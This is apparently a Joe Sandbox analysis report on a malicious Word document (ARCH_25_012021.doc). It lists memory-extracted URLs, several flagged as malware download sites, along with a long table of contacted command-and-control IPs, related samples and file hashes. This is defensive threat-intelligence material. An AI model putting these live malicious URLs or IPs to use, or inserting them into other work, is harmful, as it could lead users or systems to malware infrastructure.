                      One record per URL: Name, then Source (process and memory dump), Malicious, Antivirus Detection, Reputation.

                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                          Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp
                          Malicious: false
                          Reputation: high

                      http://www.windows.com/pctv.
                          Source: rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp
                          Malicious: false
                          Reputation: high

                      http://investor.msn.com
                          Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp
                          Malicious: false
                          Reputation: high

                      http://www.msnbc.com/news/ticker.txt
                          Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp
                          Malicious: false
                          Reputation: high

                      http://3musketeersent.net/wp-includes/TUgD/
                          Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp
                          Malicious: true
                          Antivirus Detection: 8%, Virustotal; Avira URL Cloud: malware
                          Reputation: unknown

                      http://www.icra.org/vocabulary/.
                          Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmp
                          Malicious: false
                          Antivirus Detection: URL Reputation: safe
                          Reputation: unknown

                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                          Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmp
                          Malicious: false
                          Reputation: high

                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                          Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp
                          Malicious: false
                          Reputation: high

                      https://skilmu.com/wp-admin/hQVlB8b/
                          Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp
                          Malicious: true
                          Antivirus Detection: 11%, Virustotal; Avira URL Cloud: safe
                          Reputation: unknown

                      http://jeevanlic.com/wp-content/r8M/
                          Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp
                          Malicious: true
                          Antivirus Detection: Avira URL Cloud: safe
                          Reputation: unknown

                      http://dashudance.com/thinkphp/dgs7Jm9/
                          Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp
                          Malicious: true
                          Antivirus Detection: Avira URL Cloud: malware
                          Reputation: unknown

                      http://shannared.com
                          Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp
                          Malicious: true
                          Antivirus Detection: Avira URL Cloud: safe
                          Reputation: unknown

                      http://investor.msn.com/
                          Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp
                          Malicious: false
                          Reputation: high

                      http://www.piriform.com/ccleaner
                          Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp
                          Malicious: false
                          Reputation: high

                      http://www.%s.comPA
                          Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmp
                          Malicious: false
                          Antivirus Detection: URL Reputation: safe
                          Reputation: low

                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
                          Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp
                          Malicious: true
                          Antivirus Detection: Avira URL Cloud: malware
                          Reputation: unknown

                      http://www.piriform.com/ccleanerv
                          Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp
                          Malicious: false
                                        high
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.piriform.com/powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpfalse
                                            high
                                            http://leopardcranes.com/zynq-linux-yaayf/w/powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: malware
                                            unknown

                                            Contacted IPs

                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
200.75.39.254:80 | unknown | unknown | unknown | unknown | true
192.175.111.212:7080 | unknown | unknown | unknown | unknown | true
91.233.197.70:80 | unknown | unknown | unknown | unknown | true
94.23.45.86:7080 | unknown | unknown | unknown | unknown | true
81.4.105.175:8080 | unknown | unknown | unknown | unknown | true
93.146.143.191:80 | unknown | unknown | unknown | unknown | true
93.149.120.214:80 | unknown | unknown | unknown | unknown | true
212.71.237.140:8080 | unknown | unknown | unknown | unknown | true
46.101.58.37:8080 | unknown | unknown | unknown | unknown | true
181.30.61.163:443 | unknown | unknown | unknown | unknown | true
206.189.232.2:8080 | unknown | unknown | unknown | unknown | true
181.10.46.92:80 | unknown | unknown | unknown | unknown | true
213.52.74.198:80 | unknown | unknown | unknown | unknown | true
87.106.253.248:8080 | unknown | unknown | unknown | unknown | true
217.160.169.110 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
51.255.203.164 | unknown | France | 16276 | OVHFR | true
191.223.36.170:80 | unknown | unknown | unknown | unknown | true
186.177.174.163:80 | unknown | unknown | unknown | unknown | true
217.13.106.14:8080 | unknown | unknown | unknown | unknown | true
138.97.60.141:7080 | unknown | unknown | unknown | unknown | true
201.185.69.28:443 | unknown | unknown | unknown | unknown | true
45.16.226.117:443 | unknown | unknown | unknown | unknown | true
82.208.146.142:7080 | unknown | unknown | unknown | unknown | true
192.169.223.13 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
1.226.84.243:8080 | unknown | unknown | unknown | unknown | true
84.232.229.24 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
70.32.115.157:8080 | unknown | unknown | unknown | unknown | true
217.160.169.110:8080 | unknown | unknown | unknown | unknown | true
85.105.239.184:443 | unknown | unknown | unknown | unknown | true
152.170.79.100:80 | unknown | unknown | unknown | unknown | true
143.0.85.206:7080 | unknown | unknown | unknown | unknown | true
51.255.203.164:8080 | unknown | unknown | unknown | unknown | true
94.176.234.118:443 | unknown | unknown | unknown | unknown | true
50.28.51.143:8080 | unknown | unknown | unknown | unknown | true
185.94.252.27:443 | unknown | unknown | unknown | unknown | true
31.27.59.105:80 | unknown | unknown | unknown | unknown | true
197.232.36.108:80 | unknown | unknown | unknown | unknown | true
190.45.24.210:80 | unknown | unknown | unknown | unknown | true
185.183.16.47:80 | unknown | unknown | unknown | unknown | true
190.24.243.186:80 | unknown | unknown | unknown | unknown | true
190.64.88.186:443 | unknown | unknown | unknown | unknown | true
82.48.39.246:80 | unknown | unknown | unknown | unknown | true
191.241.233.198:80 | unknown | unknown | unknown | unknown | true
170.81.48.2:80 | unknown | unknown | unknown | unknown | true
172.245.248.239:8080 | unknown | unknown | unknown | unknown | true
154.127.113.242:80 | unknown | unknown | unknown | unknown | true
95.76.153.115:80 | unknown | unknown | unknown | unknown | true
211.215.18.93:8080 | unknown | unknown | unknown | unknown | true
80.249.176.206:80 | unknown | unknown | unknown | unknown | true
110.39.160.38:443 | unknown | unknown | unknown | unknown | true
185.183.16.47 | unknown | Spain | 201453 | AKIWIFIAKIWIFIES | true
137.74.106.111:7080 | unknown | unknown | unknown | unknown | true
5.196.35.138:7080 | unknown | unknown | unknown | unknown | true
46.43.2.95:8080 | unknown | unknown | unknown | unknown | true
188.135.15.49:80 | unknown | unknown | unknown | unknown | true
177.23.7.151:80 | unknown | unknown | unknown | unknown | true
68.183.190.199:8080 | unknown | unknown | unknown | unknown | true
201.48.121.65:443 | unknown | unknown | unknown | unknown | true
105.209.235.113:8080 | unknown | unknown | unknown | unknown | true
94.126.8.1:80 | unknown | unknown | unknown | unknown | true
60.93.23.51:80 | unknown | unknown | unknown | unknown | true
62.84.75.50:80 | unknown | unknown | unknown | unknown | true
190.247.139.101:80 | unknown | unknown | unknown | unknown | true
138.97.60.140:8080 | unknown | unknown | unknown | unknown | true
177.85.167.10:80 | unknown | unknown | unknown | unknown | true
172.104.169.32:8080 | unknown | unknown | unknown | unknown | true
51.255.165.160:8080 | unknown | unknown | unknown | unknown | true
209.33.120.130:80 | unknown | unknown | unknown | unknown | true
149.202.72.142:7080 | unknown | unknown | unknown | unknown | true
12.163.208.58:80 | unknown | unknown | unknown | unknown | true
84.232.229.24:80 | unknown | unknown | unknown | unknown | true
81.17.93.134:80 | unknown | unknown | unknown | unknown | true
152.231.89.226:80 | unknown | unknown | unknown | unknown | true
87.106.46.107:8080 | unknown | unknown | unknown | unknown | true
78.206.229.130:80 | unknown | unknown | unknown | unknown | true
202.134.4.210:7080 | unknown | unknown | unknown | unknown | true
51.38.124.206:80 | unknown | unknown | unknown | unknown | true
187.162.248.237:80 | unknown | unknown | unknown | unknown | true
152.169.22.67:80 | unknown | unknown | unknown | unknown | true
12.162.84.2:8080 | unknown | unknown | unknown | unknown | true
190.162.232.138:80 | unknown | unknown | unknown | unknown | true
122.201.23.45:443 | unknown | unknown | unknown | unknown | true
109.101.137.162:8080 | unknown | unknown | unknown | unknown | true
85.214.26.7:8080 | unknown | unknown | unknown | unknown | true
116.125.120.88:443 | unknown | unknown | unknown | unknown | true
188.225.32.231:7080 | unknown | unknown | unknown | unknown | true
104.130.154.83:7080 | unknown | unknown | unknown | unknown | true
190.251.216.100:80 | unknown | unknown | unknown | unknown | true
104.131.41.185:8080 | unknown | unknown | unknown | unknown | true
80.15.100.37:80 | unknown | unknown | unknown | unknown | true
81.215.230.173:443 | unknown | unknown | unknown | unknown | true
149.62.173.247:8080 | unknown | unknown | unknown | unknown | true
167.71.148.58:443 | unknown | unknown | unknown | unknown | true
46.105.114.137:8080 | unknown | unknown | unknown | unknown | true
110.39.162.2:443 | unknown | unknown | unknown | unknown | true
190.210.246.253:80 | unknown | unknown | unknown | unknown | true
81.214.253.80:443 | unknown | unknown | unknown | unknown | true
138.197.99.250:8080 | unknown | unknown | unknown | unknown | true

                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344852
Start date: 27.01.2021
Start time: 09:29:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ARCH_25_012021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@24/8@1/98
EGA Information:
• Successful, ratio: 88.9%
HDC Information:
• Successful, ratio: 8.7% (good quality ratio 6.4%)
• Quality average: 59.1%
• Quality standard deviation: 37.6%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
• TCP Packets have been reduced to 100
• Execution Graph export aborted for target powershell.exe, PID 1552 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
09:30:37 | API Interceptor | 1x Sleep call for process: msg.exe modified
09:30:38 | API Interceptor | 64x Sleep call for process: powershell.exe modified
09:30:47 | API Interceptor | 281x Sleep call for process: rundll32.exe modified

                                            Joe Sandbox View / Context

                                            IPs

Match | Associated Sample Name / URL | Detection | Context
217.160.169.110 | Arch_2021_717-1562532.doc | malicious | 217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/
51.255.203.164 | ARCH_25_012021.doc | malicious |
51.255.203.164 | Arch_2021_717-1562532.doc | malicious |
192.169.223.13 | ARCH_25_012021.doc | malicious | shannared.com/content/lhALeS/
192.169.223.13 | Arch_2021_717-1562532.doc | malicious | shannared.com/content/lhALeS/
192.169.223.13 | Notice 8283393_829.doc | malicious | shannared.com/content/lhALeS/
192.169.223.13 | MPbBCArHPF.exe | malicious | www.zante2020.com/de92/?ofutZl=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&00GP-0=Lho4HDB0q2fdJ
192.169.223.13 | 5DY3NrVgpI.exe | malicious | www.zante2020.com/de92/?FdC4E2D=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&AjR=9r4L1
192.169.223.13 | DEBIT NOTE_ PZU000147200.exe | malicious | www.signpartnerpro.com/6bu2/?ElS=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&Qtr=KnSlEX8p2LY
192.169.223.13 | SWIFT USD 354,883.00.exe | malicious | www.signpartnerpro.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D
192.169.223.13 | SAWR000148651.exe | malicious | www.signpartnerpro.com/6bu2/?u6u0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D&9r4l2=xPJtQXiX
192.169.223.13 | DEBIT NOTE-1C017A.exe | malicious | www.signpartnerpro.com/6bu2/?Cjs0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&al4=aV50jnQxv4qp0f
192.169.223.13 | Unode.exe | malicious | www.electwatman.com/gtb/?t6A8=BSvxnM/FatY3MVaHvUsc2bSEp39whkHRVvBzdyZiJhALHrd8voDBQHL8OFVR1zdRJwYw&9r4l2=xPGHVlS8
192.169.223.13 | http://ambiancemedicalspa.com/application/orcle.php | malicious | ambiancemedicalspa.com/application/favicon.ico

                                                Domains

Match | Associated Sample Name / URL | Detection | Context
shannared.com | Arch_2021_717-1562532.doc | malicious | 192.169.223.13
shannared.com | Notice 8283393_829.doc | malicious | 192.169.223.13

                                                ASN

                                                 Columns: Associated Sample Name / URL | Detection | Context
                                                 Match: OVHFR
                                                   Invoice-3990993.exe | malicious | 66.70.204.222
                                                   ra8tqy1c.rar.dll | malicious | 158.69.118.130
                                                   ARCH_25_012021.doc | malicious | 51.255.203.164
                                                   WUHU95Apq3 | malicious | 46.105.5.118
                                                   SecuriteInfo.com.ArtemisTrojan.dll | malicious | 158.69.118.130
                                                   SecuriteInfo.com.Generic.mg.59d4c719403b7938.dll | malicious | 158.69.118.130
                                                   SecuriteInfo.com.Generic.mg.9d9c1d19818e75cc.dll | malicious | 158.69.118.130
                                                   SecuriteInfo.com.ArtemisTrojan.dll | malicious | 158.69.118.130
                                                   SecuriteInfo.com.ArtemisTrojan.dll | malicious | 158.69.118.130
                                                   roboforex4multisetup.exe | malicious | 139.99.148.202
                                                   xDKOaCQQTQ.dll | malicious | 158.69.118.130
                                                   4bEUfowOcg.dll | malicious | 158.69.118.130
                                                   P_O INV 01262021.exe | malicious | 51.195.53.221
                                                   DHL doc.exe | malicious | 51.195.53.221
                                                   PL5CS6pwNitND2n.exe | malicious | 51.75.130.83
                                                   Arch_2021_717-1562532.doc | malicious | 51.255.203.164
                                                   PARTS REQUEST SO_30005141.exe | malicious | 66.70.204.222
                                                   Document_PDF.exe | malicious | 51.195.53.221
                                                   SecuriteInfo.com.Variant.Zusy.363976.21086.exe | malicious | 54.39.198.228
                                                   ARCH 05 2_80074.doc | malicious | 144.217.190.240
                                                 Match: RCS-RDS73-75DrStaicoviciRO
                                                   ARCH_25_012021.doc | malicious | 84.232.229.24
                                                   Arch_2021_717-1562532.doc | malicious | 84.232.229.24
                                                   bin.sh | malicious | 5.14.105.137
                                                   Notice 8283393_829.doc | malicious | 84.232.229.24
                                                   MENSAJE.doc | malicious | 84.232.229.24
                                                   MENSAJE.doc | malicious | 84.232.229.24
                                                   MES-2021_01_22-3943960.doc | malicious | 84.232.229.24
                                                   Documento 2201 01279.doc | malicious | 84.232.229.24
                                                   DATI 2021.doc | malicious | 84.232.229.24
                                                   informazioni 536-32772764.doc | malicious | 84.232.229.24
                                                   Meddelelse-58931636.doc | malicious | 84.232.229.24
                                                   doc_2201_3608432.doc | malicious | 84.232.229.24
                                                   13-2021.doc | malicious | 84.232.229.24
                                                   MAIL-224201 277769577.doc | malicious | 84.232.229.24
                                                   Arch_05_222-3139.doc | malicious | 5.2.136.90
                                                   MENSAJE 2021.doc | malicious | 5.2.136.90
                                                   Documento_0501_012021.doc | malicious | 5.2.136.90
                                                   Datos_019_9251.doc | malicious | 5.2.136.90
                                                   document_84237-299265042.doc | malicious | 5.2.136.90
                                                   ARCH-012021-21-1934.doc | malicious | 5.2.136.90
                                                 Match: AS-26496-GO-DADDY-COM-LLCUS
                                                   RAPID SOA.xlsx | malicious | 184.168.131.241
                                                   0113 INV_PAK.xlsx | malicious | 166.62.29.42
                                                   quote20210126.exe.exe | malicious | 107.180.2.197
                                                   ARCH_25_012021.doc | malicious | 192.169.223.13
                                                   Informacion.doc | malicious | 166.62.10.32
                                                   v07PSzmSp9.exe | malicious | 198.71.232.3
                                                   winlog(1).exe | malicious | 184.168.131.241
                                                   win32.exe | malicious | 184.168.131.241
                                                   DAT.doc | malicious | 107.180.12.39
                                                   order pdf.exe | malicious | 184.168.131.241
                                                   Arch_2021_717-1562532.doc | malicious | 192.169.223.13
                                                   ARCH_98_24301.doc | malicious | 198.71.233.150
                                                   RFQ.xlsx | malicious | 198.71.232.3
                                                   bgJPIZIYby.exe | malicious | 184.168.131.241
                                                   E4Q30tDEB9.exe | malicious | 192.169.220.85
                                                   RevisedPO.24488_pdf.exe | malicious | 107.180.34.198
                                                   02131.doc | malicious | 166.62.28.133
                                                   mensaje_012021_1-538086.doc | malicious | 198.71.233.47
                                                   Notice 8283393_829.doc | malicious | 192.169.223.13
                                                   message_zdm.html | malicious | 184.168.131.241
                                                 Match: ONEANDONE-ASBrauerstrasse48DE
                                                   ARCH_25_012021.doc | malicious | 217.160.169.110
                                                   justifiI_0000445990_0009334372_1005_2555517182_30092019_E.WsF | malicious | 82.223.25.82
                                                   JUSTF2.tar | malicious | 213.165.67.118
                                                   NEW ORDER.xlsx | malicious | 74.208.236.196
                                                   file.doc | malicious | 212.227.200.73
                                                   winlog(1).exe | malicious | 74.208.236.196
                                                   Quote Requirements.gz.exe | malicious | 70.35.203.53
                                                   RFQ.xlsx | malicious | 70.35.203.53
                                                   Arch_2021_717-1562532.doc | malicious | 217.160.169.110
                                                   Bestellung.doc | malicious | 212.227.200.73
                                                   N00048481397007.doc | malicious | 212.227.200.73
                                                   N00048481397007.doc | malicious | 212.227.200.73
                                                   MENSAJE.doc | malicious | 212.227.200.73
                                                   MENSAJE.doc | malicious | 212.227.200.73
                                                   Archivo_AB-96114571.doc | malicious | 212.227.200.73
                                                   5390080_2021_1-259043.doc | malicious | 212.227.200.73
                                                   5390080_2021_1-259043.doc | malicious | 212.227.200.73
                                                   GV52H7XsQ2.exe | malicious | 217.76.142.246
                                                   Shipping Document PL&BL Draft.exe | malicious | 74.208.236.161
                                                   13-2021.doc | malicious | 88.208.252.128

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                 Columns: Associated Sample Name / URL | Detection | Context
                                                 Match: C:\Users\user\Kaktksw\An6othh\N49I.dll
                                                   ARCH_25_012021.doc | malicious | (no context)
                                                   Arch_2021_717-1562532.doc | malicious | (no context)

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07E7EB5-D643-47FF-B622-0CF30ED55516}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3935BE2-A796-4096-8B6B-C6BCF64E2588}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1536
                                                    Entropy (8bit):1.355309574382354
                                                    Encrypted:false
                                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbe:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                                                    MD5:B6B5BAF66D24A013A181E73F18CAB748
                                                    SHA1:B7A5BA97AB20478F0E4D5E6DCAC864208F2403BD
                                                    SHA-256:717C635B3416856BBC33233CCD388B72CC4F216621D929E7DC580D72B79798D0
                                                    SHA-512:B059D7B664E25550072ADFB4763C114F1F12313250DAA645082F5F4DBF159FF12FFF300F66CE551768340C9FE90FC0A3C488C25551B84831D5669D2FFA657154
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCH_25_012021.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 27 16:30:34 2021, length=175616, window=hide
                                                    Category:dropped
                                                    Size (bytes):2068
                                                    Entropy (8bit):4.523631563965507
                                                    Encrypted:false
                                                    SSDEEP:48:8F/XT3IkHVnj3HJQh2F/XT3IkHVnj3HJQ/:8F/XLIkHVzJQh2F/XLIkHVzJQ/
                                                    MD5:AA3B7DF3EB16E1412DA0F6CD651990E1
                                                    SHA1:7EF784E4F5180B90B12AF7270D6CFA2DDB9A4D52
                                                    SHA-256:5416F79079A05BCD1A8987F9990B6860972D0B5D416063F3B22E64C63C856F0A
                                                    SHA-512:425536BD470209E431FDD435F71A0B811F609DA29E58D09FC6CEE1AE85978C5A2277730CE0BC79EC0938849FE71351C4061784500FA488493F12CE7676104B44
                                                    Malicious:false
                                                    Preview: L..................F.... .....J..{....J..{..F....................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....;R. .ARCH_2~1.DOC..R.......Q.y.Q.y*...8.....................A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\124406\Users.user\Desktop\ARCH_25_012021.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......124406..........D_....3N...W...9F.C...........[D_
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):80
                                                    Entropy (8bit):4.211348644823317
                                                    Encrypted:false
                                                    SSDEEP:3:M1+qbl8WdblmX1+qblv:M4qbrdbPqb1
                                                    MD5:EF242110122D8695A53B38974D63C306
                                                    SHA1:F74EF8F7E90EF2B664F03FC482D2F1526159AC48
                                                    SHA-256:320FBB51CEDFAE2FA1371AAD0622E8A5333C66EBE13A89A21B19789A0739B236
                                                    SHA-512:B2AE3AEC71C0575957AA19EC1A9BE9DE587D7E3DF8345129972B98873B028512FE1CA0C31893FB589ACC12235CBA451563E66B6B2AFD00908074C4D0C79C7C8A
                                                    Malicious:false
                                                    Preview: [doc]..ARCH_25_012021.LNK=0..ARCH_25_012021.LNK=0..[doc]..ARCH_25_012021.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXL3RQT94R3A0BC61R7X.temp
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8016
                                                    Entropy (8bit):3.587077696978234
                                                    Encrypted:false
                                                    SSDEEP:96:chQCsMqZqvsqvJCwo7z8hQCsMqZqvsEHyqvJCworpzkKYyHYf8R8lUVVIu:cywo7z8yMHnorpzkXf8RdIu
                                                    MD5:2AFCC6ACCB87C1228DEA47C66ABE1379
                                                    SHA1:E31078085D680E885A403812F3BB51403F7398FA
